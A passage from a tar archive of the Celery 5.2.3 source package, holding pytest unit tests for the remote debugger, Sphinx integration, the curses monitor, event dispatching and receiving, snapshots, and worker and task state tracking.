**connection_kwargs) x.default_channel.queues = {} y.default_channel.queues = {} callback = Mock() migrate_tasks(x, y, callback=callback, accept=['text/plain'], app=app) callback.assert_not_called() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/test_pytest.py0000664000175000017500000000142100000000000020516 0ustar00asifasif00000000000000import pytest pytest_plugins = ["pytester"] try: pytest.fail() except BaseException as e: Failed = type(e) @pytest.mark.skipif( not hasattr(pytest, "PytestUnknownMarkWarning"), reason="Older pytest version without marker warnings", ) def test_pytest_celery_marker_registration(testdir): """Verify that using the 'celery' marker does not result in a warning""" testdir.plugins.append("celery") testdir.makepyfile( """ import pytest @pytest.mark.celery(foo="bar") def test_noop(): pass """ ) result = testdir.runpytest('-q') with pytest.raises((ValueError, Failed)): result.stdout.fnmatch_lines_random( "*PytestUnknownMarkWarning: Unknown pytest.mark.celery*" ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/test_rdb.py0000664000175000017500000000611200000000000017737 0ustar00asifasif00000000000000import errno import socket from unittest.mock import Mock, patch import pytest import t.skip from celery.contrib.rdb import Rdb, debugger, set_trace from celery.utils.text import WhateverIO class SockErr(socket.error): errno = None class test_Rdb: @patch('celery.contrib.rdb.Rdb') def test_debugger(self, Rdb): x = debugger() assert x assert x is debugger() @patch('celery.contrib.rdb.debugger') @patch('celery.contrib.rdb._frame') def test_set_trace(self, _frame, debugger): assert set_trace(Mock()) assert set_trace() debugger.return_value.set_trace.assert_called() @patch('celery.contrib.rdb.Rdb.get_avail_port') @t.skip.if_pypy def test_rdb(self, get_avail_port): sock = Mock() get_avail_port.return_value = (sock, 8000) sock.accept.return_value = (Mock(), ['helu']) out = WhateverIO() with Rdb(out=out) as rdb: get_avail_port.assert_called() assert 'helu' in out.getvalue() # set_quit with patch('sys.settrace') as settrace: rdb.set_quit() settrace.assert_called_with(None) # set_trace with patch('celery.contrib.rdb.Pdb.set_trace') as pset: with patch('celery.contrib.rdb._frame'): rdb.set_trace() rdb.set_trace(Mock()) pset.side_effect = SockErr pset.side_effect.errno = errno.ENOENT with pytest.raises(SockErr): rdb.set_trace() # _close_session rdb._close_session() rdb.active = True rdb._handle = None rdb._client = None rdb._sock = None rdb._close_session() # do_continue rdb.set_continue = Mock() rdb.do_continue(Mock()) rdb.set_continue.assert_called_with() # do_quit rdb.set_quit = Mock() rdb.do_quit(Mock()) rdb.set_quit.assert_called_with() @patch('socket.socket') @t.skip.if_pypy def test_get_avail_port(self, sock): out = WhateverIO() sock.return_value.accept.return_value = (Mock(), ['helu']) with Rdb(out=out): pass with patch('celery.contrib.rdb.current_process') as curproc: curproc.return_value.name = 'PoolWorker-10' with Rdb(out=out): pass err = sock.return_value.bind.side_effect = SockErr() err.errno = errno.ENOENT with pytest.raises(SockErr): with Rdb(out=out): pass err.errno = errno.EADDRINUSE with pytest.raises(Exception): with Rdb(out=out): pass called = [0] def effect(*a, **kw): try: if called[0] > 50: return True raise err finally: called[0] += 1 sock.return_value.bind.side_effect = effect with Rdb(out=out): pass ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/contrib/test_sphinx.py0000664000175000017500000000134100000000000020500 0ustar00asifasif00000000000000import os import pytest try: from sphinx.application import Sphinx # noqa: F401 from sphinx_testing import TestApp sphinx_installed = True except ImportError: sphinx_installed = False SRCDIR = os.path.join(os.path.dirname(__file__), 'proj') @pytest.mark.skipif( sphinx_installed is False, reason='Sphinx is not installed' ) def test_sphinx(): app = TestApp(srcdir=SRCDIR, confdir=SRCDIR) app.build() contents = open(os.path.join(app.outdir, 'contents.html'), encoding='utf-8').read() assert 'This is a sample Task' in contents assert 'This is a sample Shared Task' in contents assert ( 'This task is in a different module!' not in contents ) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.815757 celery-5.2.3/t/unit/events/0000775000175000017500000000000000000000000015423 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/__init__.py0000664000175000017500000000000000000000000017522 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/test_cursesmon.py0000664000175000017500000000437100000000000021057 0ustar00asifasif00000000000000import pytest pytest.importorskip('curses') class MockWindow: def getmaxyx(self): return self.y, self.x class test_CursesDisplay: def setup(self): from celery.events import cursesmon self.monitor = cursesmon.CursesMonitor(object(), app=self.app) self.win = MockWindow() self.monitor.win = self.win def test_format_row_with_default_widths(self): self.win.x, self.win.y = 91, 24 row = self.monitor.format_row( '783da208-77d0-40ca-b3d6-37dd6dbb55d3', 'task.task.task.task.task.task.task.task.task.tas', 'workerworkerworkerworkerworkerworkerworkerworker', '21:13:20', 'SUCCESS') assert ('783da208-77d0-40ca-b3d6-37dd6dbb55d3 ' 'workerworker... task.task.[.]tas 21:13:20 SUCCESS ' == row) def test_format_row_with_truncated_uuid(self): self.win.x, self.win.y = 80, 24 row = self.monitor.format_row( '783da208-77d0-40ca-b3d6-37dd6dbb55d3', 'task.task.task.task.task.task.task.task.task.tas', 'workerworkerworkerworkerworkerworkerworkerworker', '21:13:20', 'SUCCESS') expected = ('783da208-77d0-40ca-b3d... workerworker... ' 'task.task.[.]tas 21:13:20 SUCCESS ') assert row == expected def test_format_title_row(self): self.win.x, self.win.y = 80, 24 row = self.monitor.format_row('UUID', 'TASK', 'WORKER', 'TIME', 'STATE') assert ('UUID WORKER ' 'TASK TIME STATE ' == row) def test_format_row_for_wide_screen_with_short_uuid(self): self.win.x, self.win.y = 140, 24 row = self.monitor.format_row( '783da208-77d0-40ca-b3d6-37dd6dbb55d3', 'task.task.task.task.task.task.task.task.task.tas', 'workerworkerworkerworkerworkerworkerworkerworker', '21:13:20', 'SUCCESS') assert len(row) == 136 assert ('783da208-77d0-40ca-b3d6-37dd6dbb55d3 ' 'workerworkerworkerworkerworkerworker... ' 'task.task.task.task.task.task.task.[.]tas ' '21:13:20 SUCCESS ' == row) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/test_events.py0000664000175000017500000002615400000000000020350 0ustar00asifasif00000000000000import socket from unittest.mock import Mock, call import pytest from celery.events import Event from celery.events.receiver import CLIENT_CLOCK_SKEW class MockProducer: raise_on_publish = False def __init__(self, *args, **kwargs): self.sent = [] def publish(self, msg, *args, **kwargs): if self.raise_on_publish: raise KeyError() self.sent.append(msg) def close(self): pass def has_event(self, kind): for event in self.sent: if event['type'] == kind: return event return False def test_Event(): event = Event('world war II') assert event['type'] == 'world war II' assert event['timestamp'] class test_EventDispatcher: def test_redis_uses_fanout_exchange(self): self.app.connection = Mock() conn = self.app.connection.return_value = Mock() conn.transport.driver_type = 'redis' dispatcher = self.app.events.Dispatcher(conn, enabled=False) assert dispatcher.exchange.type == 'fanout' def test_others_use_topic_exchange(self): self.app.connection = Mock() conn = self.app.connection.return_value = Mock() conn.transport.driver_type = 'amqp' dispatcher = self.app.events.Dispatcher(conn, enabled=False) assert dispatcher.exchange.type == 'topic' def test_takes_channel_connection(self): x = self.app.events.Dispatcher(channel=Mock()) assert x.connection is x.channel.connection.client def test_sql_transports_disabled(self): conn = Mock() conn.transport.driver_type = 'sql' x = self.app.events.Dispatcher(connection=conn) assert not x.enabled def test_send(self): producer = MockProducer() producer.connection = self.app.connection_for_write() connection = Mock() connection.transport.driver_type = 'amqp' eventer = self.app.events.Dispatcher(connection, enabled=False, buffer_while_offline=False) eventer.producer = producer eventer.enabled = True eventer.send('World War II', ended=True) assert producer.has_event('World War II') eventer.enabled = False eventer.send('World War III') assert not producer.has_event('World War III') evs = ('Event 1', 'Event 2', 'Event 3') eventer.enabled = True eventer.producer.raise_on_publish = True eventer.buffer_while_offline = False with pytest.raises(KeyError): eventer.send('Event X') eventer.buffer_while_offline = True for ev in evs: eventer.send(ev) eventer.producer.raise_on_publish = False eventer.flush() for ev in evs: assert producer.has_event(ev) eventer.flush() def test_send_buffer_group(self): buf_received = [None] producer = MockProducer() producer.connection = self.app.connection_for_write() connection = Mock() connection.transport.driver_type = 'amqp' eventer = self.app.events.Dispatcher( connection, enabled=False, buffer_group={'task'}, buffer_limit=2, ) eventer.producer = producer eventer.enabled = True eventer._publish = Mock(name='_publish') def on_eventer_publish(events, *args, **kwargs): buf_received[0] = list(events) eventer._publish.side_effect = on_eventer_publish assert not eventer._group_buffer['task'] eventer.on_send_buffered = Mock(name='on_send_buffered') eventer.send('task-received', uuid=1) prev_buffer = eventer._group_buffer['task'] assert eventer._group_buffer['task'] eventer.on_send_buffered.assert_called_with() eventer.send('task-received', uuid=1) assert not eventer._group_buffer['task'] eventer._publish.assert_has_calls([ call([], eventer.producer, 'task.multi'), ]) # clear in place assert eventer._group_buffer['task'] is prev_buffer assert len(buf_received[0]) == 2 eventer.on_send_buffered = None eventer.send('task-received', uuid=1) def test_flush_no_groups_no_errors(self): eventer = self.app.events.Dispatcher(Mock()) eventer.flush(errors=False, groups=False) def test_enter_exit(self): with self.app.connection_for_write() as conn: d = self.app.events.Dispatcher(conn) d.close = Mock() with d as _d: assert _d d.close.assert_called_with() def test_enable_disable_callbacks(self): on_enable = Mock() on_disable = Mock() with self.app.connection_for_write() as conn: with self.app.events.Dispatcher(conn, enabled=False) as d: d.on_enabled.add(on_enable) d.on_disabled.add(on_disable) d.enable() on_enable.assert_called_with() d.disable() on_disable.assert_called_with() def test_enabled_disable(self): connection = self.app.connection_for_write() channel = connection.channel() try: dispatcher = self.app.events.Dispatcher(connection, enabled=True) dispatcher2 = self.app.events.Dispatcher(connection, enabled=True, channel=channel) assert dispatcher.enabled assert dispatcher.producer.channel assert (dispatcher.producer.serializer == self.app.conf.event_serializer) created_channel = dispatcher.producer.channel dispatcher.disable() dispatcher.disable() # Disable with no active producer dispatcher2.disable() assert not dispatcher.enabled assert dispatcher.producer is None # does not close manually provided channel assert not dispatcher2.channel.closed dispatcher.enable() assert dispatcher.enabled assert dispatcher.producer # XXX test compat attribute assert dispatcher.publisher is dispatcher.producer prev, dispatcher.publisher = dispatcher.producer, 42 try: assert dispatcher.producer == 42 finally: dispatcher.producer = prev finally: channel.close() connection.close() assert created_channel.closed class test_EventReceiver: def test_process(self): message = {'type': 'world-war'} got_event = [False] def my_handler(event): got_event[0] = True connection = Mock() connection.transport_cls = 'memory' r = self.app.events.Receiver( connection, handlers={'world-war': my_handler}, node_id='celery.tests', ) r._receive(message, object()) assert got_event[0] def test_accept_argument(self): r = self.app.events.Receiver(Mock(), accept={'app/foo'}) assert r.accept == {'app/foo'} def test_event_queue_prefix__default(self): r = self.app.events.Receiver(Mock()) assert r.queue.name.startswith('celeryev.') def test_event_queue_prefix__setting(self): self.app.conf.event_queue_prefix = 'eventq' r = self.app.events.Receiver(Mock()) assert r.queue.name.startswith('eventq.') def test_event_queue_prefix__argument(self): r = self.app.events.Receiver(Mock(), queue_prefix='fooq') assert r.queue.name.startswith('fooq.') def test_event_exchange__default(self): r = self.app.events.Receiver(Mock()) assert r.exchange.name == 'celeryev' def test_event_exchange__setting(self): self.app.conf.event_exchange = 'exchange_ev' r = self.app.events.Receiver(Mock()) assert r.exchange.name == 'exchange_ev' def test_catch_all_event(self): message = {'type': 'world-war'} got_event = [False] def my_handler(event): got_event[0] = True connection = Mock() connection.transport_cls = 'memory' r = self.app.events.Receiver(connection, node_id='celery.tests') r.handlers['*'] = my_handler r._receive(message, object()) assert got_event[0] def test_itercapture(self): connection = self.app.connection_for_write() try: r = self.app.events.Receiver(connection, node_id='celery.tests') it = r.itercapture(timeout=0.0001, wakeup=False) with pytest.raises(socket.timeout): next(it) with pytest.raises(socket.timeout): r.capture(timeout=0.00001) finally: connection.close() def test_event_from_message_localize_disabled(self): r = self.app.events.Receiver(Mock(), node_id='celery.tests') r.adjust_clock = Mock() ts_adjust = Mock() r.event_from_message( {'type': 'worker-online', 'clock': 313}, localize=False, adjust_timestamp=ts_adjust, ) ts_adjust.assert_not_called() r.adjust_clock.assert_called_with(313) def test_event_from_message_clock_from_client(self): r = self.app.events.Receiver(Mock(), node_id='celery.tests') r.clock.value = 302 r.adjust_clock = Mock() body = {'type': 'task-sent'} r.event_from_message( body, localize=False, adjust_timestamp=Mock(), ) assert body['clock'] == r.clock.value + CLIENT_CLOCK_SKEW def test_receive_multi(self): r = self.app.events.Receiver(Mock(name='connection')) r.process = Mock(name='process') efm = r.event_from_message = Mock(name='event_from_message') def on_efm(*args): return args efm.side_effect = on_efm r._receive([1, 2, 3], Mock()) r.process.assert_has_calls([call(1), call(2), call(3)]) def test_itercapture_limit(self): connection = self.app.connection_for_write() channel = connection.channel() try: events_received = [0] def handler(event): events_received[0] += 1 producer = self.app.events.Dispatcher( connection, enabled=True, channel=channel, ) r = self.app.events.Receiver( connection, handlers={'*': handler}, node_id='celery.tests', ) evs = ['ev1', 'ev2', 'ev3', 'ev4', 'ev5'] for ev in evs: producer.send(ev) it = r.itercapture(limit=4, wakeup=True) next(it) # skip consumer (see itercapture) list(it) assert events_received[0] == 4 finally: channel.close() connection.close() def test_State(app): state = app.events.State() assert dict(state.workers) == {} def test_default_dispatcher(app): with app.events.default_dispatcher() as d: assert d assert d.connection ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/events/test_snapshot.py0000664000175000017500000000642100000000000020676 0ustar00asifasif00000000000000from unittest.mock import Mock, patch import pytest from celery.app.events import Events from celery.events.snapshot import Polaroid, evcam class MockTimer: installed = [] def call_repeatedly(self, secs, fun, *args, **kwargs): self.installed.append(fun) return Mock(name='TRef') timer = MockTimer() class test_Polaroid: def setup(self): self.state = self.app.events.State() def test_constructor(self): x = Polaroid(self.state, app=self.app) assert x.app is self.app assert x.state is self.state assert x.freq assert x.cleanup_freq assert x.logger assert not x.maxrate def test_install_timers(self): x = Polaroid(self.state, app=self.app) x.timer = timer x.__exit__() x.__enter__() assert x.capture in MockTimer.installed assert x.cleanup in MockTimer.installed x._tref.cancel.assert_not_called() x._ctref.cancel.assert_not_called() x.__exit__() x._tref.cancel.assert_called() x._ctref.cancel.assert_called() x._tref.assert_called() x._ctref.assert_not_called() def test_cleanup(self): x = Polaroid(self.state, app=self.app) cleanup_signal_sent = [False] def handler(**kwargs): cleanup_signal_sent[0] = True x.cleanup_signal.connect(handler) x.cleanup() assert cleanup_signal_sent[0] def test_shutter__capture(self): x = Polaroid(self.state, app=self.app) shutter_signal_sent = [False] def handler(**kwargs): shutter_signal_sent[0] = True x.shutter_signal.connect(handler) x.shutter() assert shutter_signal_sent[0] shutter_signal_sent[0] = False x.capture() assert shutter_signal_sent[0] def test_shutter_maxrate(self): x = Polaroid(self.state, app=self.app, maxrate='1/h') shutter_signal_sent = [0] def handler(**kwargs): shutter_signal_sent[0] += 1 x.shutter_signal.connect(handler) for i in range(30): x.shutter() x.shutter() x.shutter() assert shutter_signal_sent[0] == 1 class test_evcam: class MockReceiver: raise_keyboard_interrupt = False def capture(self, **kwargs): if self.__class__.raise_keyboard_interrupt: raise KeyboardInterrupt() class MockEvents(Events): def Receiver(self, *args, **kwargs): return test_evcam.MockReceiver() def setup(self): self.app.events = self.MockEvents() self.app.events.app = self.app def test_evcam(self, restore_logging): evcam(Polaroid, timer=timer, app=self.app) evcam(Polaroid, timer=timer, loglevel='CRITICAL', app=self.app) self.MockReceiver.raise_keyboard_interrupt = True try: with pytest.raises(SystemExit): evcam(Polaroid, timer=timer, app=self.app) finally: self.MockReceiver.raise_keyboard_interrupt = False @patch('celery.platforms.create_pidlock') def test_evcam_pidfile(self, create_pidlock): evcam(Polaroid, timer=timer, pidfile='/var/pid', app=self.app) create_pidlock.assert_called_with('/var/pid') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/events/test_state.py0000664000175000017500000005342700000000000020167 0ustar00asifasif00000000000000import pickle from decimal import Decimal from itertools import count from random import shuffle from time import time from unittest.mock import Mock, patch import pytest from celery import states, uuid from celery.events import Event from celery.events.state import (HEARTBEAT_DRIFT_MAX, HEARTBEAT_EXPIRE_WINDOW, State, Task, Worker, heartbeat_expires) class replay: def __init__(self, state): self.state = state self.rewind() self.setup() self.current_clock = 0 def setup(self): pass def next_event(self): ev = self.events[next(self.position)] ev['local_received'] = ev['timestamp'] try: self.current_clock = ev['clock'] except KeyError: ev['clock'] = self.current_clock = self.current_clock + 1 return ev def __iter__(self): return self def __next__(self): try: self.state.event(self.next_event()) except IndexError: raise StopIteration() next = __next__ def rewind(self): self.position = count(0) return self def play(self): for _ in self: pass class ev_worker_online_offline(replay): def setup(self): self.events = [ Event('worker-online', hostname='utest1'), Event('worker-offline', hostname='utest1'), ] class ev_worker_heartbeats(replay): def setup(self): self.events = [ Event('worker-heartbeat', hostname='utest1', timestamp=time() - HEARTBEAT_EXPIRE_WINDOW * 2), Event('worker-heartbeat', hostname='utest1'), ] class ev_task_states(replay): def setup(self): tid = self.tid = uuid() tid2 = self.tid2 = uuid() self.events = [ Event('task-received', uuid=tid, name='task1', args='(2, 2)', kwargs="{'foo': 'bar'}", retries=0, eta=None, hostname='utest1'), Event('task-started', uuid=tid, hostname='utest1'), Event('task-revoked', uuid=tid, hostname='utest1'), Event('task-retried', uuid=tid, exception="KeyError('bar')", traceback='line 2 at main', hostname='utest1'), Event('task-failed', uuid=tid, exception="KeyError('foo')", traceback='line 1 at main', hostname='utest1'), Event('task-succeeded', uuid=tid, result='4', runtime=0.1234, hostname='utest1'), Event('foo-bar'), Event('task-received', uuid=tid2, name='task2', args='(4, 4)', kwargs="{'foo': 'bar'}", retries=0, eta=None, parent_id=tid, root_id=tid, hostname='utest1'), ] def QTEV(type, uuid, hostname, clock, name=None, timestamp=None): """Quick task event.""" return Event(f'task-{type}', uuid=uuid, hostname=hostname, clock=clock, name=name, timestamp=timestamp or time()) class ev_logical_clock_ordering(replay): def __init__(self, state, offset=0, uids=None): self.offset = offset or 0 self.uids = self.setuids(uids) super().__init__(state) def setuids(self, uids): uids = self.tA, self.tB, self.tC = uids or [uuid(), uuid(), uuid()] return uids def setup(self): offset = self.offset tA, tB, tC = self.uids self.events = [ QTEV('received', tA, 'w1', name='tA', clock=offset + 1), QTEV('received', tB, 'w2', name='tB', clock=offset + 1), QTEV('started', tA, 'w1', name='tA', clock=offset + 3), QTEV('received', tC, 'w2', name='tC', clock=offset + 3), QTEV('started', tB, 'w2', name='tB', clock=offset + 5), QTEV('retried', tA, 'w1', name='tA', clock=offset + 7), QTEV('succeeded', tB, 'w2', name='tB', clock=offset + 9), QTEV('started', tC, 'w2', name='tC', clock=offset + 10), QTEV('received', tA, 'w3', name='tA', clock=offset + 13), QTEV('succeded', tC, 'w2', name='tC', clock=offset + 12), QTEV('started', tA, 'w3', name='tA', clock=offset + 14), QTEV('succeeded', tA, 'w3', name='TA', clock=offset + 16), ] def rewind_with_offset(self, offset, uids=None): self.offset = offset self.uids = self.setuids(uids or self.uids) self.setup() self.rewind() class ev_snapshot(replay): def setup(self): self.events = [ Event('worker-online', hostname='utest1'), Event('worker-online', hostname='utest2'), Event('worker-online', hostname='utest3'), ] for i in range(20): worker = not i % 2 and 'utest2' or 'utest1' type = not i % 2 and 'task2' or 'task1' self.events.append(Event('task-received', name=type, uuid=uuid(), hostname=worker)) class test_Worker: def test_equality(self): assert Worker(hostname='foo').hostname == 'foo' assert Worker(hostname='foo') == Worker(hostname='foo') assert Worker(hostname='foo') != Worker(hostname='bar') assert hash(Worker(hostname='foo')) == hash(Worker(hostname='foo')) assert hash(Worker(hostname='foo')) != hash(Worker(hostname='bar')) def test_heartbeat_expires__Decimal(self): assert heartbeat_expires( Decimal(344313.37), freq=60, expire_window=200) == 344433.37 def test_compatible_with_Decimal(self): w = Worker('george@vandelay.com') timestamp, local_received = Decimal(time()), time() w.event('worker-online', timestamp, local_received, fields={ 'hostname': 'george@vandelay.com', 'timestamp': timestamp, 'local_received': local_received, 'freq': Decimal(5.6335431), }) assert w.alive def test_eq_ne_other(self): assert Worker('a@b.com') == Worker('a@b.com') assert Worker('a@b.com') != Worker('b@b.com') assert Worker('a@b.com') != object() def test_reduce_direct(self): w = Worker('george@vandelay.com') w.event('worker-online', 10.0, 13.0, fields={ 'hostname': 'george@vandelay.com', 'timestamp': 10.0, 'local_received': 13.0, 'freq': 60, }) fun, args = w.__reduce__() w2 = fun(*args) assert w2.hostname == w.hostname assert w2.pid == w.pid assert w2.freq == w.freq assert w2.heartbeats == w.heartbeats assert w2.clock == w.clock assert w2.active == w.active assert w2.processed == w.processed assert w2.loadavg == w.loadavg assert w2.sw_ident == w.sw_ident def test_update(self): w = Worker('george@vandelay.com') w.update({'idx': '301'}, foo=1, clock=30, bah='foo') assert w.idx == '301' assert w.foo == 1 assert w.clock == 30 assert w.bah == 'foo' def test_survives_missing_timestamp(self): worker = Worker(hostname='foo') worker.event('heartbeat') assert worker.heartbeats == [] def test_repr(self): assert repr(Worker(hostname='foo')) def test_drift_warning(self): worker = Worker(hostname='foo') with patch('celery.events.state.warn') as warn: worker.event(None, time() + (HEARTBEAT_DRIFT_MAX * 2), time()) warn.assert_called() assert 'Substantial drift' in warn.call_args[0][0] def test_updates_heartbeat(self): worker = Worker(hostname='foo') worker.event(None, time(), time()) assert len(worker.heartbeats) == 1 h1 = worker.heartbeats[0] worker.event(None, time(), time() - 10) assert len(worker.heartbeats) == 2 assert worker.heartbeats[-1] == h1 class test_Task: def test_equality(self): assert Task(uuid='foo').uuid == 'foo' assert Task(uuid='foo') == Task(uuid='foo') assert Task(uuid='foo') != Task(uuid='bar') assert hash(Task(uuid='foo')) == hash(Task(uuid='foo')) assert hash(Task(uuid='foo')) != hash(Task(uuid='bar')) def test_info(self): task = Task(uuid='abcdefg', name='tasks.add', args='(2, 2)', kwargs='{}', retries=2, result=42, eta=1, runtime=0.0001, expires=1, parent_id='bdefc', root_id='dedfef', foo=None, exception=1, received=time() - 10, started=time() - 8, exchange='celery', routing_key='celery', succeeded=time()) assert sorted(list(task._info_fields)) == sorted(task.info().keys()) assert (sorted(list(task._info_fields + ('received',))) == sorted(task.info(extra=('received',)))) assert (sorted(['args', 'kwargs']) == sorted(task.info(['args', 'kwargs']).keys())) assert not list(task.info('foo')) def test_reduce_direct(self): task = Task(uuid='uuid', name='tasks.add', args='(2, 2)') fun, args = task.__reduce__() task2 = fun(*args) assert task == task2 def test_ready(self): task = Task(uuid='abcdefg', name='tasks.add') task.event('received', time(), time()) assert not task.ready task.event('succeeded', time(), time()) assert task.ready def test_sent(self): task = Task(uuid='abcdefg', name='tasks.add') task.event('sent', time(), time()) assert task.state == states.PENDING def test_merge(self): task = Task() task.event('failed', time(), time()) task.event('started', time(), time()) task.event('received', time(), time(), { 'name': 'tasks.add', 'args': (2, 2), }) assert task.state == states.FAILURE assert task.name == 'tasks.add' assert task.args == (2, 2) task.event('retried', time(), time()) assert task.state == states.RETRY def test_repr(self): assert repr(Task(uuid='xxx', name='tasks.add')) class test_State: def test_repr(self): assert repr(State()) def test_pickleable(self): state = State() r = ev_logical_clock_ordering(state) r.play() assert pickle.loads(pickle.dumps(state)) def test_task_logical_clock_ordering(self): state = State() r = ev_logical_clock_ordering(state) tA, tB, tC = r.uids r.play() now = list(state.tasks_by_time()) assert now[0][0] == tA assert now[1][0] == tC assert now[2][0] == tB for _ in range(1000): shuffle(r.uids) tA, tB, tC = r.uids r.rewind_with_offset(r.current_clock + 1, r.uids) r.play() now = list(state.tasks_by_time()) assert now[0][0] == tA assert now[1][0] == tC assert now[2][0] == tB @pytest.mark.skip('TODO: not working') def test_task_descending_clock_ordering(self): state = State() r = ev_logical_clock_ordering(state) tA, tB, tC = r.uids r.play() now = list(state.tasks_by_time(reverse=False)) assert now[0][0] == tA assert now[1][0] == tB assert now[2][0] == tC for _ in range(1000): shuffle(r.uids) tA, tB, tC = r.uids r.rewind_with_offset(r.current_clock + 1, r.uids) r.play() now = list(state.tasks_by_time(reverse=False)) assert now[0][0] == tB assert now[1][0] == tC assert now[2][0] == tA def test_get_or_create_task(self): state = State() task, created = state.get_or_create_task('id1') assert task.uuid == 'id1' assert created task2, created2 = state.get_or_create_task('id1') assert task2 is task assert not created2 def test_get_or_create_worker(self): state = State() worker, created = state.get_or_create_worker('george@vandelay.com') assert worker.hostname == 'george@vandelay.com' assert created worker2, created2 = state.get_or_create_worker('george@vandelay.com') assert worker2 is worker assert not created2 def test_get_or_create_worker__with_defaults(self): state = State() worker, created = state.get_or_create_worker( 'george@vandelay.com', pid=30, ) assert worker.hostname == 'george@vandelay.com' assert worker.pid == 30 assert created worker2, created2 = state.get_or_create_worker( 'george@vandelay.com', pid=40, ) assert worker2 is worker assert worker2.pid == 40 assert not created2 def test_worker_online_offline(self): r = ev_worker_online_offline(State()) next(r) assert list(r.state.alive_workers()) assert r.state.workers['utest1'].alive r.play() assert not list(r.state.alive_workers()) assert not r.state.workers['utest1'].alive def test_itertasks(self): s = State() s.tasks = {'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'} assert len(list(s.itertasks(limit=2))) == 2 def test_worker_heartbeat_expire(self): r = ev_worker_heartbeats(State()) next(r) assert not list(r.state.alive_workers()) assert not r.state.workers['utest1'].alive r.play() assert list(r.state.alive_workers()) assert r.state.workers['utest1'].alive def test_task_states(self): r = ev_task_states(State()) # RECEIVED next(r) assert r.tid in r.state.tasks task = r.state.tasks[r.tid] assert task.state == states.RECEIVED assert task.received assert task.timestamp == task.received assert task.worker.hostname == 'utest1' # STARTED next(r) assert r.state.workers['utest1'].alive assert task.state == states.STARTED assert task.started assert task.timestamp == task.started assert task.worker.hostname == 'utest1' # REVOKED next(r) assert task.state == states.REVOKED assert task.revoked assert task.timestamp == task.revoked assert task.worker.hostname == 'utest1' # RETRY next(r) assert task.state == states.RETRY assert task.retried assert task.timestamp == task.retried assert task.worker.hostname, 'utest1' assert task.exception == "KeyError('bar')" assert task.traceback == 'line 2 at main' # FAILURE next(r) assert task.state == states.FAILURE assert task.failed assert task.timestamp == task.failed assert task.worker.hostname == 'utest1' assert task.exception == "KeyError('foo')" assert task.traceback == 'line 1 at main' # SUCCESS next(r) assert task.state == states.SUCCESS assert task.succeeded assert task.timestamp == task.succeeded assert task.worker.hostname == 'utest1' assert task.result == '4' assert task.runtime == 0.1234 # children, parent, root r.play() assert r.tid2 in r.state.tasks task2 = r.state.tasks[r.tid2] assert task2.parent is task assert task2.root is task assert task2 in task.children def test_task_children_set_if_received_in_wrong_order(self): r = ev_task_states(State()) r.events.insert(0, r.events.pop()) r.play() assert r.state.tasks[r.tid2] in r.state.tasks[r.tid].children assert r.state.tasks[r.tid2].root is r.state.tasks[r.tid] assert r.state.tasks[r.tid2].parent is r.state.tasks[r.tid] def assertStateEmpty(self, state): assert not state.tasks assert not state.workers assert not state.event_count assert not state.task_count def assertState(self, state): assert state.tasks assert state.workers assert state.event_count assert state.task_count def test_freeze_while(self): s = State() r = ev_snapshot(s) r.play() def work(): pass s.freeze_while(work, clear_after=True) assert not s.event_count s2 = State() r = ev_snapshot(s2) r.play() s2.freeze_while(work, clear_after=False) assert s2.event_count def test_clear_tasks(self): s = State() r = ev_snapshot(s) r.play() assert s.tasks s.clear_tasks(ready=False) assert not s.tasks def test_clear(self): r = ev_snapshot(State()) r.play() assert r.state.event_count assert r.state.workers assert r.state.tasks assert r.state.task_count r.state.clear() assert not r.state.event_count assert not r.state.workers assert r.state.tasks assert not r.state.task_count r.state.clear(False) assert not r.state.tasks def test_task_types(self): r = ev_snapshot(State()) r.play() assert sorted(r.state.task_types()) == ['task1', 'task2'] def test_tasks_by_time(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.tasks_by_time())) == 20 assert len(list(r.state.tasks_by_time(reverse=False))) == 20 def test_tasks_by_type(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.tasks_by_type('task1'))) == 10 assert len(list(r.state.tasks_by_type('task2'))) == 10 assert len(r.state.tasks_by_type['task1']) == 10 assert len(r.state.tasks_by_type['task2']) == 10 def test_alive_workers(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.alive_workers())) == 3 def test_tasks_by_worker(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.tasks_by_worker('utest1'))) == 10 assert len(list(r.state.tasks_by_worker('utest2'))) == 10 assert len(r.state.tasks_by_worker['utest1']) == 10 assert len(r.state.tasks_by_worker['utest2']) == 10 def test_survives_unknown_worker_event(self): s = State() s.event({ 'type': 'worker-unknown-event-xxx', 'foo': 'bar', }) s.event({ 'type': 'worker-unknown-event-xxx', 'hostname': 'xxx', 'foo': 'bar', }) def test_survives_unknown_worker_leaving(self): s = State(on_node_leave=Mock(name='on_node_leave')) (worker, created), subject = s.event({ 'type': 'worker-offline', 'hostname': 'unknown@vandelay.com', 'timestamp': time(), 'local_received': time(), 'clock': 301030134894833, }) assert worker == Worker('unknown@vandelay.com') assert not created assert subject == 'offline' assert 'unknown@vandelay.com' not in s.workers s.on_node_leave.assert_called_with(worker) def test_on_node_join_callback(self): s = State(on_node_join=Mock(name='on_node_join')) (worker, created), subject = s.event({ 'type': 'worker-online', 'hostname': 'george@vandelay.com', 'timestamp': time(), 'local_received': time(), 'clock': 34314, }) assert worker assert created assert subject == 'online' assert 'george@vandelay.com' in s.workers s.on_node_join.assert_called_with(worker) def test_survives_unknown_task_event(self): s = State() s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 